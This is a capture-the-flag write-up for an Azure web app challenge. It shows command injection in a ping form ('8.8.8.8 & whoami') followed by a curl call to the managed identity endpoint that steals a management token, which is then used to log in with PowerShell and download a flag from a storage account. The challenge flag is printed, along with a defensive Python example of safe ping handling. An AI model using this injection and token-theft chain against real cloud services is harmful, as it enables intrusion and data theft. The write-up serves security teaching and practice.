Managed Secrets

Difficulty: Medium, Points: 500, Solves: 3

Description

Today in school, I learnt how to create a website with Python! There is also the networking lesson where I learn the ping command...

ps the flag is not in the instance :)

https://lncctf2023-webapp.azurewebsites.net

Hints: Are there any internal services/endpoints running by default?

Visiting the site shows an Azure Web App Service running.

The web app sends a ping to whatever IP address or URL you give it. This is a very classical command injection sample challenge, and we are able to easily get code execution:

8.8.8.8 & whoami
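The server-side view of this bug, as an added example that is not the challenge's source code (the page does not show it): a shell-string ping handler beside a hardened one. All function names are hypothetical, and a Linux `ping -c 1` is assumed.

```python
import ipaddress
import re
import subprocess

# Hostname labels: letters, digits, inner hyphens only. No spaces, no shell
# metacharacters, and no leading '-' that ping could read as an option.
_HOSTNAME = re.compile(
    r"(?=.{1,253}\Z)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\Z"
)


def vulnerable_command(target: str) -> str:
    """Assumed vulnerable pattern: user input pasted into a shell string."""
    # Passed to a shell, '&' in the input ends ping and starts a second command.
    return "ping -c 1 " + target


def validate_target(target: str) -> str:
    """Return the target if it is an IP literal or a hostname, else raise."""
    target = target.strip()
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME.match(target):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def safe_argv(target: str) -> list[str]:
    """Build an argument vector so the target is always exactly one argument."""
    return ["ping", "-c", "1", validate_target(target)]


def ping(target: str) -> int:
    """Run ping without a shell; the input is never parsed as shell syntax."""
    result = subprocess.run(safe_argv(target), shell=False, timeout=5,
                            capture_output=True)
    return result.returncode
```

Validation and the shell-free argument vector are independent layers: either one alone stops the `8.8.8.8 & whoami` input from reaching a shell as a second command.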

Since I now have code execution, I can get the app service to post to the IMDS to retrieve a management token, referring to HackTricks.

8.8.8.8 & curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
{"access_token":"<JWT access token omitted>","expires_on":"04/16/2023 22:34:06 +00:00","resource":"https://management.azure.com/","token_type":"Bearer","client_id":"982d1ca9-81ee-450e-8953-0f1a27129eb2"}

I am able to authenticate using the access token and client ID values.

$token = "<access_token value from the response>"
$id = "982d1ca9-81ee-450e-8953-0f1a27129eb2"

Connect-AzAccount -AccessToken $token -AccountId $id

Next, I enumerate the resources that this service principal has access to.

I am then able to retrieve the flag from the storage account.

$rg="lncctf2023_managed_secrets"
$saname="lncctf2023managedsa"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container private
Get-AzStorageBlobContent -Blob flag.txt -Container private -Destination flag.txt -Context $ctx

Flag: LNC2023{h3y_h0w_did_y0u_g3T_thi5}
